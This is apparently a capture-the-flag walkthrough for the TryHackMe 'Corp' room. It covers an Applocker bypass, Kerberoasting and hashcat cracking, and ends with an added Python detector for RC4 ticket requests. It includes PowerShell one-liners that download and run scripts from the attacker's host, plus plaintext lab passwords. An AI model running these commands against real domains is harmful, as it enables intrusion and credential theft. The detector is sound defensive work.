# Corp

**Room Link:** <https://tryhackme.com/room/corp>

## Bypassing Applocker

Load PowerUp.ps1 into memory.

**Kali**

```
wget https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1
python2 -m SimpleHTTPServer 81
```

Add the following line to the bottom of PowerUp.ps1 so that it invokes all checks automatically once downloaded.

**PowerUp.ps1**

```
Invoke-AllChecks
```

**Victim(powershell)**

```
powershell -ep bypass
iex (New-Object Net.WebClient).DownloadString('http://$KALI:81/PowerUp.ps1')
```



**Kali**

```
echo "dHFqSnBFWDlRdjh5YktJM3lIY2M9TCE1ZSghd1c7JFQ=" | base64 -d
```


**Kali**

```
xfreerdp +clipboard /u:"Administrator" /v:$VICTIM:3389 /size:1024x568 /smart-sizing:800x1200
Password: tqjJpEX9Qv8ybKI3yHcc=L!5e(!wW;$T
```


## Kerberoasting

Run the below command from the Administrator account we just got access to.

**Victim(powershell)**

```
setspn -T medin -Q */*
```


**Kali**

```
wget https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1
python2 -m SimpleHTTPServer 81
```

Add the following line to the bottom of Invoke-Kerberoast.ps1 so that it runs automatically once downloaded.

```
Invoke-Kerberoast -OutputFormat hashcat | fl
```

**Victim(powershell)**

```
powershell -ep bypass
powershell -c "iex ((New-Object System.Net.WebClient).DownloadString('http://10.10.131.240:81/Invoke-Kerberoast.ps1'))"
```


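Run this on the saved output (hash.txt) to get rid of all the whitespace and put each hash on its own line in hash2.txt. Writing to a second file matters: redirecting back into hash.txt would truncate it before `cat` reads it.

**Kali**

```
cat hash.txt | sed 's/[[:space:]]//g' | tr -d '\n' | sed 's/$krb5tgs$23$*/\n&/g' > hash2.txt
```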

Let's use hashcat to brute-force this password. The hash type is Kerberos 5 TGS-REP etype 23, and the hashcat mode for it is 13100.

**Kali**

```
hashcat -m 13100 -a 0 hash2.txt /usr/share/wordlists/rockyou.txt --force
hashcat -m 13100 -a 0 hash2.txt /usr/share/wordlists/rockyou.txt --force --show
```


**Kali**

```
xfreerdp +clipboard /u:"fela" /v:$VICTIM:3389 /size:1024x568 /smart-sizing:800x1200
Password: rubenF124
```
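
Seen from the domain controller, the etype 23 service tickets requested in this section are logged as Security event 4769 with `TicketEncryptionType` 0x17. The following is an added example (not part of the original write-up) that flags a requester pulling RC4 tickets for several user-backed services; the flattened `key=value` record format, the threshold and every sample value are assumptions constructed for illustration.

```python
"""Flag likely Kerberoasting from Windows Security event 4769 records."""
from collections import defaultdict

RC4_HMAC = 0x17  # etype 23, the ticket type hashcat mode 13100 targets

def parse_event(line):
    """Parse one flattened 'key=value key=value' record into a dict (assumed export format)."""
    return dict(field.split("=", 1) for field in line.split())

def is_roastable_request(ev):
    """Successful RC4 ticket for a user-backed service (not krbtgt, not a machine account)."""
    svc = ev["ServiceName"]
    return (ev["Status"] == "0x0"
            and int(ev["TicketEncryptionType"], 16) == RC4_HMAC
            and not svc.endswith("$")
            and svc.lower() != "krbtgt")

def detect(lines, min_services=3):
    """Return {(requester, source IP): sorted services} for requesters that obtained
    RC4 tickets for at least min_services distinct user-backed services."""
    seen = defaultdict(set)
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") == "4769" and is_roastable_request(ev):
            key = (ev["TargetUserName"].lower(), ev["IpAddress"])
            seen[key].add(ev["ServiceName"])
    return {k: sorted(v) for k, v in seen.items() if len(v) >= min_services}

# Constructed sample records: accounts, services and addresses are made up.
SAMPLE = """\
EventID=4769 TargetUserName=alice@EXAMPLE.LOCAL ServiceName=FS01$ TicketEncryptionType=0x12 IpAddress=::ffff:10.0.0.21 Status=0x0
EventID=4769 TargetUserName=bob@EXAMPLE.LOCAL ServiceName=svc_sql TicketEncryptionType=0x17 IpAddress=::ffff:10.0.0.50 Status=0x0
EventID=4769 TargetUserName=bob@EXAMPLE.LOCAL ServiceName=svc_web TicketEncryptionType=0x17 IpAddress=::ffff:10.0.0.50 Status=0x0
EventID=4769 TargetUserName=bob@EXAMPLE.LOCAL ServiceName=svc_backup TicketEncryptionType=0x17 IpAddress=::ffff:10.0.0.50 Status=0x0
EventID=4769 TargetUserName=bob@EXAMPLE.LOCAL ServiceName=krbtgt TicketEncryptionType=0x17 IpAddress=::ffff:10.0.0.50 Status=0x0
EventID=4769 TargetUserName=carol@EXAMPLE.LOCAL ServiceName=svc_sql TicketEncryptionType=0x17 IpAddress=::ffff:10.0.0.33 Status=0x0
EventID=4768 TargetUserName=bob ServiceName=krbtgt TicketEncryptionType=0x12 IpAddress=::ffff:10.0.0.50 Status=0x0
""".splitlines()

if __name__ == "__main__":
    for (user, ip), services in detect(SAMPLE).items():
        print(f"ALERT {user} from {ip}: RC4 tickets for {len(services)} services: {services}")
```

A single RC4 request (carol in the sample) stays below the threshold because legacy clients still produce them; lowering `min_services` trades fewer misses for more noise.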
